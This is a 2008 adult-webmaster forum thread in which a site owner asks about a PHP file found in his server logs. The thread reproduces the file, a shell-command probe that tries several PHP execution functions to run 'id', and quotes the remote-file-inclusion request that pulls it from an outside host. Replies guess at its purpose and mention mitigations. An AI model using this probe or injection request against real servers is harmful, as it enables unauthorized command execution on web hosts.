GoFuckYourself.com - Adult Webmaster Forum

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)
-   Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)
-   -   Who are TOPYN.COM and why they have this code on their site ???? (https://gfy.com/showthread.php?t=849955)

directfiesta 08-23-2008 01:51 PM
Who are TOPYN.COM and why they have this code on their site ????
 
http://www.topyn.com/ips.txt

PHP Code:
<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;
A few entries in my paysite logs .... as well as a ton listed on google : view seach

Hacking shit again ????

fatfoo 08-23-2008 02:45 PM
could be hacking shit again

bobby666 08-23-2008 02:57 PM
thanks, now i have a virus alert on my pc

directfiesta 08-23-2008 03:34 PM
Quote:
Originally Posted by bobby666 (Post 14652498)
thanks, now i have a virus alert on my pc
First, script was posted ... and there is no virus in that ....

Quote:
80.93.54.47 ... GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.topyn.com/ips.txt? HTTP/1.1

That referenced URL still works, so if you want you can retrieve the 'exploit' code. But all it apparently does is to try various methods to execute "id", probably to locate web servers that are vulnerable and maybe even running as "root" user.

Obviously this is a brute force; that site doesn't have an index.php.

Is that anything new? Or is it just some script kiddie trying to re-use an aged exploit? But on the other hand, I havn't seen such a suhosin alert in months. Anybody knows which PHP script might be vulnerable to this attack vector.


[Update: I've received two mails pointing out that such vulnerablities are found in some PHP apps every now and then, so it might just be some script kiddie scanning brute force once more. Supposedly this cannot be exploited when register_globals is off and/or suhosin is used.]
AVG:

"Scan ""Shell extension scan"" was finished."
"Infections found:";"0"
"Infected objects removed or healed:";"0"
"Not removed or healed:";"0"
"Spyware found:";"0"
"Spyware removed:";"0"
"Not removed:";"0"
"Warnings count:";"0"
"Information count:";"0"
"Scan started:";"Saturday, August 23, 2008, 6:35:38 PM"
"Scan finished:";"Saturday, August 23, 2008, 6:35:39 PM (less than one second)"
"Total object scanned:";"1"
"User who launched the scan:";"User"


All times are GMT -7. The time now is 04:40 AM.

Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123